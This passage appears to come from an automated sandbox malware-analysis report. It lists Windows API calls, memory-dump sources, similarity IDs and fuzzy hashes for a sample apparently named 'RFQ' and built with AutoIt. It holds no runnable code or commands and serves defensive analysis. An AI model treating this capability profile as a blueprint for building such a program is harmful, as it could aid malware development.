• GetProcessId.KERNEL32(00000000), ref: 0070AE5F
• CloseHandle.KERNEL32(00000000), ref: 0070AE8E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: CloseExecuteHandleProcessShell_wcslen
• String ID: <$@
• API String ID: 146682121-1426351568
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006E715C
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006E7192
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006E71A3
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006E7225
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00713D68
• IsMenu.USER32(?), ref: 00713D7D
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00713DC5
• DrawMenuBar.USER32 ref: 00713DD8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
APIs
  • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
  • Part of subcall function 006E3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 006E3C12
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006E1DAA
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006E1DBD
• SendMessageW.USER32(?,00000189,?,00000000), ref: 006E1DED
  • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00712EC0
• LoadLibraryW.KERNEL32(?), ref: 00712EC7
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00712EDC
• DestroyWindow.USER32(?), ref: 00712EE4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 3529120543-1011021900
                                                                            • Opcode ID: fd679129b5a7a8937cc017fa3f2136c597021a4969d0432ede938620fdde2692
                                                                            • Instruction ID: dc8f359321ef94d6311397e58058b6c354c4ff1ced8d7e72359b90fd84cb0664
                                                                            • Opcode Fuzzy Hash: fd679129b5a7a8937cc017fa3f2136c597021a4969d0432ede938620fdde2692
                                                                            • Instruction Fuzzy Hash: 5121AE71200205BFEB109F68DC48EFB37ADFB59364F108218FA50A61D1D739DCA69760
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006A4CAE,00000003,?,006A4C4E,00000003,007488C8,0000000C,006A4DA5,00000003,00000002), ref: 006A4D1D
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006A4D30
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,006A4CAE,00000003,?,006A4C4E,00000003,007488C8,0000000C,006A4DA5,00000003,00000002,00000000), ref: 006A4D53
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: ed86ffed5ea18fc0f4b406668c22ce33d4b869aae64d917084762be8eef12aa3
                                                                            • Instruction ID: 2a5009928c12453c47e74ccf485ef26fb2b3bd1fc1c50760de15459da174f929
                                                                            • Opcode Fuzzy Hash: ed86ffed5ea18fc0f4b406668c22ce33d4b869aae64d917084762be8eef12aa3
                                                                            • Instruction Fuzzy Hash: 4CF0A43454021CBBDB116F94DC09BDDBBB5EF44751F0080A4F805A62A1CF755D40DE95
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32 ref: 006DDB49
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006DDB5B
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 006DDB81
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                            • API String ID: 145871493-2590602151
                                                                            • Opcode ID: 56f5eca5c0e603f771467180903eb74a2e758ff8fafb5d2feab5017cdd8c8b4a
                                                                            • Instruction ID: ae6c45e44798e4571a44ed2738ad21c83de16248a022ae418c2f82172176ce0f
                                                                            • Opcode Fuzzy Hash: 56f5eca5c0e603f771467180903eb74a2e758ff8fafb5d2feab5017cdd8c8b4a
                                                                            • Instruction Fuzzy Hash: 9DE02BF0C4A515ABDB32A7548C589ED761B9F00B09F1EC05BFC05E6380DB78CD85D694
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0068687F,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 0068683E
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00686850
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,0068687F,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686862
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 145871493-3689287502
                                                                            • Opcode ID: 7baf3328f623680c49bbe8f0b9d40efaa69b32a4b1131232b02ade18eb9c68e7
                                                                            • Instruction ID: 201a605dac25bc6667b1d6ec78c0fbe239092f636366848e7de9adc7bd78e6ec
                                                                            • Opcode Fuzzy Hash: 7baf3328f623680c49bbe8f0b9d40efaa69b32a4b1131232b02ade18eb9c68e7
                                                                            • Instruction Fuzzy Hash: D5E086F16816216792222769AC0CADA66159F81F12B058125FD09D2280DF58CD0195B4
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006C488B,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686804
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00686816
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,006C488B,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686829
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 145871493-1355242751
                                                                            • Opcode ID: cc65cfb306771a50d4890d888560efaf8ca4023883399635a448d808b0c327a5
                                                                            • Instruction ID: 6cef6eb95408a2c4e09b190eed4adb41d5aca4c39c84cb9b49824c1fe237e556
                                                                            • Opcode Fuzzy Hash: cc65cfb306771a50d4890d888560efaf8ca4023883399635a448d808b0c327a5
                                                                            • Instruction Fuzzy Hash: 55D012B15C25216752332769EC189DE7E16DE8DF217058165BC09A2398DF29CD01D6F4
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F2B23
                                                                            • DeleteFileW.KERNEL32(?), ref: 006F2BA5
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006F2BBB
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F2BCC
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F2BDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$Copy
                                                                            • String ID:
                                                                            • API String ID: 3226157194-0
                                                                            • Opcode ID: 0b1bfeec3d0f0a1be5a15fa0e683a8d7b9b80f1c3b2f756a49f912f23ca58b89
                                                                            • Instruction ID: fb00636da367ea4d5d6e11c38fb8b956ed7a99c35c7f9e4a4f2d7ec83d15e734
                                                                            • Opcode Fuzzy Hash: 0b1bfeec3d0f0a1be5a15fa0e683a8d7b9b80f1c3b2f756a49f912f23ca58b89
                                                                            • Instruction Fuzzy Hash: DAB170B190011EABDF55EFA4CC95EEEB77EEF45304F1040AAF609E6141EA319E448F64
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32 ref: 0070A34E
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0070A35C
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0070A38F
                                                                            • CloseHandle.KERNEL32(?), ref: 0070A564
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 3488606520-0
                                                                            • Opcode ID: 0bba0afb55ed9790b8b29bdf44a65a3992416191c6cda41ed13a17c871bce646
                                                                            • Instruction ID: 4316cc9237fe9f4a6be552e2e6f49a9cbe6427a7bf9d3b936ed27af32b3aeea8
                                                                            • Opcode Fuzzy Hash: 0bba0afb55ed9790b8b29bdf44a65a3992416191c6cda41ed13a17c871bce646
                                                                            • Instruction Fuzzy Hash: E5A19DB1604301AFD760EF28C886F2AB7E6AF44710F14895CF5999B3D2D7B5ED408B86
                                                                            APIs
                                                                              • Part of subcall function 006EDCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006ECE40,?), ref: 006EDD1B
                                                                              • Part of subcall function 006EDCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006ECE40,?), ref: 006EDD34
                                                                              • Part of subcall function 006EE0B7: GetFileAttributesW.KERNEL32(?,006ECEB3), ref: 006EE0B8
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 006EE391
                                                                            • MoveFileW.KERNEL32(?,?), ref: 006EE3CA
                                                                            • _wcslen.LIBCMT ref: 006EE509
                                                                            • _wcslen.LIBCMT ref: 006EE521
                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 006EE56E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3183298772-0
                                                                            • Opcode ID: 63df803bd50539a2cb153d0448c0fd478fd5aa3a5ca6aa5aaefe1365569d968e
                                                                            • Instruction ID: 7abd2ac2949d99a82a7cefee7a57a4c7f071ce5a1e38be7fa99b0654281297f6
                                                                            • Opcode Fuzzy Hash: 63df803bd50539a2cb153d0448c0fd478fd5aa3a5ca6aa5aaefe1365569d968e
                                                                            • Instruction Fuzzy Hash: 1C51C4B20093859BC764EB95CC809DF73EEAF85340F00492EF585C3191EF71A688CB5A
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 0070C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070B5D5,?,?), ref: 0070C8DC
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C918
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C98F
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C9C5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0070B9CC
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0070BA27
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0070BA8A
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0070BACD
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0070BADA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 826366716-0
                                                                            • Opcode ID: 0473d679cd3be4c9f45e7bf436c7fde727a38269c9763c567741e0158a3674fe
                                                                            • Instruction ID: e8768b9c95e8f0e551403e5977ca755846d3b025122bc3697a1d0f571e0ed47d
                                                                            • Opcode Fuzzy Hash: 0473d679cd3be4c9f45e7bf436c7fde727a38269c9763c567741e0158a3674fe
                                                                            • Instruction Fuzzy Hash: 9E61AE71218241EFC314DF64C894E2ABBE5FF84318F14865DF0998B2A2DB35EE45CB92
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 006E8B23
                                                                            • VariantClear.OLEAUT32 ref: 006E8B94
                                                                            • VariantClear.OLEAUT32 ref: 006E8BF3
                                                                            • VariantClear.OLEAUT32(?), ref: 006E8C66
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006E8C91
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: ad316e60d2b2efea029db4d3b19c7c5b7be17b3be700d4897e64e2d3c2adba47
• Instruction ID: 0684a0315853709c604031a8992a1aeb5f9463bc779aa307cc442cb1df594f5c
• Opcode Fuzzy Hash: ad316e60d2b2efea029db4d3b19c7c5b7be17b3be700d4897e64e2d3c2adba47
• Instruction Fuzzy Hash: FB517CB5A01759DFCB10CF69C884AAAB7F9FF89710B118569E909DB310D734E911CFA0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006F8ACC
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 006F8AF8
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006F8B50
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006F8B75
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006F8B7D
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: 116b3298061fc7ec60128f109f250502ca1eeee19261e3d5452d5d1ed9481f4e
• Instruction ID: 1a6b83f043d726a34c7437310002c1e5a6f7b7c50c96f8a3cfeca875043aa939
• Opcode Fuzzy Hash: 116b3298061fc7ec60128f109f250502ca1eeee19261e3d5452d5d1ed9481f4e
• Instruction Fuzzy Hash: 85512C75A002199FCB15EF54C885AA9BBF6FF48314F04C098E949AB3A2CB75ED41CB94
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00708E67
• GetProcAddress.KERNEL32(00000000,?), ref: 00708EF7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00708F13
• GetProcAddress.KERNEL32(00000000,?), ref: 00708F59
• FreeLibrary.KERNEL32(00000000), ref: 00708F79
  • Part of subcall function 0069F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,006F0F61,?,753CE610), ref: 0069F7C5
  • Part of subcall function 0069F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,006DF94D,00000000,00000000,?,?,006F0F61,?,753CE610,?,006DF94D), ref: 0069F7EC
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
• Opcode ID: 1cd4d49449b7452f69722d6efbad8f37ec7d0d583c3b4f5e386b737cf2d0dbf1
• Instruction ID: 8392f518ab5201d03c388304627ba1e6f2fcee0b1cb4df0b1fe2c0a1c6bef8a1
• Opcode Fuzzy Hash: 1cd4d49449b7452f69722d6efbad8f37ec7d0d583c3b4f5e386b737cf2d0dbf1
• Instruction Fuzzy Hash: 24514A74600205DFCB51EF68C494C99BBF2FF09324B0582A8E9569F3A2CB35ED85CB91
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 00716B01
• SetWindowLongW.USER32(?,000000EC,?), ref: 00716B18
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00716B41
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,006FAA97,00000000,00000000), ref: 00716B66
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00716B95
Similarity
• API ID: Window$Long$MessageSendShow
• String ID:
• API String ID: 3688381893-0
• Opcode ID: 6541ec28cf6c07963ae265b428d777a1d4d22034679cde925508c24e170979a9
• Instruction ID: 8809e2bafc5bb16469bf778d2ee5e610e2b5ce5238426ccc66cd55bca7e9fb0f
• Opcode Fuzzy Hash: 6541ec28cf6c07963ae265b428d777a1d4d22034679cde925508c24e170979a9
• Instruction Fuzzy Hash: 8841AD75A04204AFD7259F6CCC58FE97BA5EB0A360F258264F919E72E0C778ED81CA44
APIs
• GetCursorPos.USER32(?), ref: 0069EAAE
• ScreenToClient.USER32(?,?), ref: 0069EACB
• GetAsyncKeyState.USER32(00000001), ref: 0069EB02
• GetAsyncKeyState.USER32(00000002), ref: 0069EB1C
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 203d05df815cfa8bea799a25901730897045dbe40d6d0c6c07ba56b53939da34
• Instruction ID: 154aec544e70ea4003ec86db55a97c4f4b83fcabfe869697a22480a07387b934
• Opcode Fuzzy Hash: 203d05df815cfa8bea799a25901730897045dbe40d6d0c6c07ba56b53939da34
• Instruction Fuzzy Hash: 05415E71A0851AFFDF15EFA8C844BEEB776FB05320F20821AE425A72D0D7366954CB61
APIs
• GetInputState.USER32 ref: 006F37E9
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 006F3840
• TranslateMessage.USER32(?), ref: 006F3869
• DispatchMessageW.USER32(?), ref: 006F3873
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006F3884
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
• Opcode ID: 87af81ec8ccebc98f1b0dbb804a4ee8b09492454085b8dd2582f209f6f7895db
• Instruction ID: 2ba6e38ef9fb344cb5d961d3eec7cf43743fbdf8b0c54d6329149c25f29455c5
• Opcode Fuzzy Hash: 87af81ec8ccebc98f1b0dbb804a4ee8b09492454085b8dd2582f209f6f7895db
• Instruction Fuzzy Hash: CC31D6B05043599EEB25DB74D809BF23BAAAB01346F04846DE672C33D0E3ADA685CB15
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,006FC13C,00000000), ref: 006FCE56
• InternetReadFile.WININET(?,00000000,?,?), ref: 006FCE8D
• GetLastError.KERNEL32(?,00000000,?,?,?,006FC13C,00000000), ref: 006FCED2
• SetEvent.KERNEL32(?,?,00000000,?,?,?,006FC13C,00000000), ref: 006FCEE6
• SetEvent.KERNEL32(?,?,00000000,?,?,?,006FC13C,00000000), ref: 006FCF10
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
• Opcode ID: aa1e4b1503493c2924945d6a9eccd3971e27d2f3abb64e6d3da900ede9412845
• Instruction ID: 6536b4b5f31c87854b3e1c5044beebb8baa512759f9a1d9f20a3bed4722d0dce
• Opcode Fuzzy Hash: aa1e4b1503493c2924945d6a9eccd3971e27d2f3abb64e6d3da900ede9412845
• Instruction Fuzzy Hash: 87312C7150020DAFDB20DFA5D984AFBBBFAEF15364B10842EE606D3281D734AE459B64
APIs
• GetWindowRect.USER32(?,?), ref: 006E1859
• PostMessageW.USER32(00000001,00000201,00000001), ref: 006E1905
• Sleep.KERNEL32(00000000,?,?,?), ref: 006E190D
• PostMessageW.USER32(00000001,00000202,00000000), ref: 006E191E
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 006E1926
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: f8efd6a87f704a7096aa54d770483d769de8d682a150dc1f700c26c15100a90b
• Instruction ID: 87aba6beaf9e035b29aae50231bfa810ba9f753b0006e5fa55aa694c4e775a71
• Opcode Fuzzy Hash: f8efd6a87f704a7096aa54d770483d769de8d682a150dc1f700c26c15100a90b
• Instruction Fuzzy Hash: 1331C271900359EFDB14CFA9CC89ADE3BB6EB05315F108229F921AB2D1C7709D54EB90
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 0071567A
• SendMessageW.USER32(?,00001074,?,00000001), ref: 007156D2
• _wcslen.LIBCMT ref: 007156E4
• _wcslen.LIBCMT ref: 007156EF
• SendMessageW.USER32(?,00001002,00000000,?), ref: 0071574B
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
• Opcode ID: c0c6ced3decbd7e8840ca4515b3f8e31a38efc539d5ca5c07f689f7a2aff5e57
• Instruction ID: 1080fbf795e40b885a2dac0894699b57fe1bcbdd9b50fa7b665ab1db95fe40f6
• Opcode Fuzzy Hash: c0c6ced3decbd7e8840ca4515b3f8e31a38efc539d5ca5c07f689f7a2aff5e57
• Instruction Fuzzy Hash: E3218171900608DADB259F98CC44AEDB7B8EF41764F10825AE929EB1C0D7B8D9C5CF50
APIs
• IsWindow.USER32(00000000), ref: 00700878
• GetForegroundWindow.USER32 ref: 0070088F
• GetDC.USER32(00000000), ref: 007008CB
• GetPixel.GDI32(00000000,?,00000003), ref: 007008D7
• ReleaseDC.USER32(00000000,00000003), ref: 0070090F
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: 3f6c95e0b0c0037c86fb83d7fd15da619086faab9db35ce3e5ac82f335343b92
• Instruction ID: 9359fb4208118dfb48ebdbf25e8d4f1545e7d69211a0f3c3f15984da39796081
• Opcode Fuzzy Hash: 3f6c95e0b0c0037c86fb83d7fd15da619086faab9db35ce3e5ac82f335343b92
• Instruction Fuzzy Hash: 95216F75600214EFD704EFA9C888AAA77F6FF48750F04C42CE54697791DA74AC00CB94
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 006BCD66
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006BCD89
